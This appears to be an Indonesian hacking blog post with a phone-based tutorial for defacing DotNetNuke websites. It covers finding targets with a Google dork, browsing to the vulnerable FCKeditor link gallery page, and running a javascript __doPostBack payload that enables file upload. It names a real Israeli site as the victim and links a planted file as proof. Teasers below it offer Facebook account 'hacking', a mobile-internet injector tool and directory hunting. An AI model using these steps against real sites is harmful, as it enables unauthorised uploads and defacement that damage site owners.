Langsung ke konten utama

Cara Hacking Website Melalui Handphone


Cara Hacking Website Melalui Handphone Mungkin kedengarannya gila bila membaca judul diatas….! ‘it’s imposible‘  kata beberapa orang, Saya hanya seorang Newbie yg selalu pgn mencoba, maaf bila postingan ini dah basi dan untuk para master jangan dibaca ya coz dah jadul.
Pada dasarnya aplikasi web browser di HP maupun di PC it cara kerjanya sama,yg membedakan adalah system yg bekerja mendukung applikasi it sendiri (Java, SymBian, Linux, Windows, Android etc). Dan ukuran atau kapasitas serta kemampuan menampilkan web. Tapi pada dasarnya cara kerjanya tetap. Sama, jadi apa yg bisa dilakukan lwt pc,kmgknan bsa jg dikerjakan lwt hape…!
Nah yg coba saya bahas disini adalah exploit web dgn cara hack web melalui DNN (dot net nuke) exploit
melalui hape.

Bahan2 yg kita butuhkan adalah:
1. Operamini browser versi 5.0
2. Operamini browser versi 4.2

Kenapa pake 2 Web Browser ?

Lebih enak pake 2 browser di atas.alasannya adalah:
1. Operamini 5.0 mendukung multi tab jadi cocok buat mencari target dan mengetesnya   tanpa harus open close satu2.
2. Operamini 5.0 mempunyai kemampuan copi paste,pilih text dan lgsg mensearchnya dlm sekali klik ditab yg sama ataupun membukanya di tab baru.
3. Operamini 4.2 respon browser lbh bagus dr yg v 5.0
Setelah cek target dr opmin 5.0 dan ternyata vuln tgl copy kan aja linknya di operamini 4.2 .
Tgl kta exploit lwt situ..
(Operamini 4.2 tdk multi tab,untuk yg multi tab slhkan cari di opera modif di google)

Nah sekarang memasuki langkah2 atau cara2 melakukan hack web dgn DNN exploit melalui opera mini.
Pertama: pastikan anda masih mempunyai saldo pulsa
Kedua : buka operamini v 5.0 anda dan ketik di kolom google search dorknya->
inurl:”/portals/0″
And search!!…
Nah dapet kan??
Tinggal kita pilh target yang pas di hati.dan kali ini saya coba di situs orang israel.
Taruh cursor di link target trus tekan angka 1 di keypad hape anda.
Pilih open in new tab.
Begitu seterusnya untuk link target yg lain sampai keluar beberapa tab.
Oh,ya untuk mengetahui gimana ,apa dan bagaimana DNN exploit it silahkan baca disini:
http://securityreason.com/exploitalert/6234
Next, misalkan kita dah dpt targetnya nih…
Example site:
http://fril.co.il/portals/0/cwindex.txt
Spti keterangan di securityreason di atas kita coba potong link target dan menggantinya dgn
/Providers/HtmlEditorProviders/ Fck/fcklinkgallery.aspx
->http://site.com/[path]/portals/0/a.txt
Menjadi
->http://site.com/[path]/Providers/HtmlEditorProviders/ Fck/fcklinkgallery.aspx  
Lakukan it pada smua target yg udah kamu buka pada browser operamini 5.0 km.biar gak bolak balik
copas lagi.
Setelah dapet dan pasti vuln seperti site di bawah ini.
http://fril.co.il//Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
Copy dan pastekan di opera 4.2 kamu.
Nb:Alasannya knapa pindah browser yaitu pada opera 5.0 di hape saya kurang respon pada perintahupload. Proses upload berjalan tapi file tidak terupload dan begitu di coba di v 4.2 sukses terupload. Tapi bila di v.5.0 km bisa ya lanjut aja disitu.gak ush pndah applikasi.
Lanjut proses.!
Setelah site target di buka di opmin 4.2
Pilih : file ( select a file on your site)
Tunggu biar loading selesai dan menampilkan 2 kolom:
Kolom 1 biasanya tulisan ‘root’
Kolom 2 berisi macam2 file.
Setelah loading selesai hapus link di addres bar operamini kamu dan ganti dgn script di bawah ini:
javascript:__doPostBack(‘ctlURL $cmdUpload’,”)
Lalu klik ok….
Kolom yg tdnya berisi ‘root’ dan ‘jenis2 file’
Skrg ganti menjadi kolom ‘root’ dan kolom kosong untuk upload file.
Nah skrg tgl km upload tuh file txt yg udah km simpan di hape km.
SUCCESS..! you cAn hacked a web site from mobile phone.
Hasilnya seperti ini http://fril.co.il/portals/0/xadal.txt < 100% lewat handphone
Nb: angka 1 di operamini berfungsi untuk copas,select text and open new tab.
-sekian-

Komentar

Postingan populer dari blog ini

Cara Hack facebook lewat ID 2012

pagi gann.....!!! kali ini saya akan berposting tentang cara hack lewat id facebook ,sebelumnya mf yach bila tampilan blog ini masih brantakan,,soalnya blom ane beresin,hehehe maklum ane bru ngebuat blog lagi,soalnya yg sebelumnya udah bnyak topik yang di tampilkan jadi ane terpaksa ngebuat blog baru dengan artikel khusus yaitu tentang hacker ,wkwkwk bte nich semaleman gak bisa tidur,dari pada gak ada kerjaan mending mending nyari tutorial yang bisa di manfaatin,ane mencoba searching google kesana kemari dengan kata kuci "hacker facebook via id".setelah ber jam2 nyari,akhirnya nemu juga dan tidak sengaja ane nemu di website luar negri. ah gak usah banyak basa basi, mending langsung za ke inti pembahasannya.Ok...berikut tutorial hack facebook via id: 1. log in dulu di facebook 2. nah untuk cara yang kedua tinggal nyari facebook target 3. kalo udh ketemu tinggal liat id facebook nya,cara sebagai berikut : misalkan alamat profil korban : http://www.facebook.com/

Injek smatfreen 28 juni 2013 (internet gratis PC)

Hai sob selamat pagi,ane muncul lagi nich dengan membawa tool lagi,klo mau mnjelang subuh biasa nya ane gak bisa tidur juga,maklumlah insomnia klo kata orang hehehe maen game mulu bawaan nya bikin jenuh za klo game2 nya di ulang lagi,padahal udah tmat brapa kali,wkwk langsng ke pokok tujuan nya ya sob,untuk sekarang ane mau posting tentang  Injek smatfreen 28 juni 2013 (internet gratis PC)  klo sebelumnya ane posting yang hack modem smartfren 23 Juni,namun kebanyakan pemakai kata nya tool itu sudah tidak jalan lagi alias co.id,Tapi itu sich tergantung daerahnya masing2,klo di ane tool yg kemarin masih jalan za sob ^_^ Karena sob pastinya udah pada tau yach cara penggunaannya,maka langsung za yh di sedot (Bagi yg blom tau cara penggunaanya bisa baca di postingan sebelumnya ) Download : -Injec Smartfren tgl 28 Juni 2013 -Ultra+susu nya -Tutorial (bagi yg blom tau) Thank's For : Om Alecz XC

Berburu Direktori dan File Sensitif dengan DirBuster

Mungkin anda akan terkejut bila mengetahui bahwa ada banyak website yang berhasil dihack/dideface hanya karena sebuah kesalahan “konyol”. Tidak dibutuhkan keahlian programming, SQL atau jurus njelimet lainnya, cuma membuka sebuah direktori yang berisi file-file sensitif, maka sebuah website akan bertekuk lutut. Ya benar, ini adalah fakta yang seringkali terjadi. Direktori Sensitif Semua direktori atau file yang mengandung informasi berguna buat hacker untuk mendeface website anda, maka direktori itu termasuk sensitif. Beberapa direktori atau file yang tergolong sensitif antara lain: #>Backup Hal yang biasanya dibackup adalah database dan source script webnya. Bayangkan apa yang terjadi bila hacker berhasil mendapatkan seluruh file php dan “database dump” dalam satu file zip? Kalau anda berpikir itu tidak mungkin terjadi, anda salah besar, karena saya sering menemukan file backup berekstensi zip, tar.gz, atau sql berserakan di websitenya. #>Halaman Login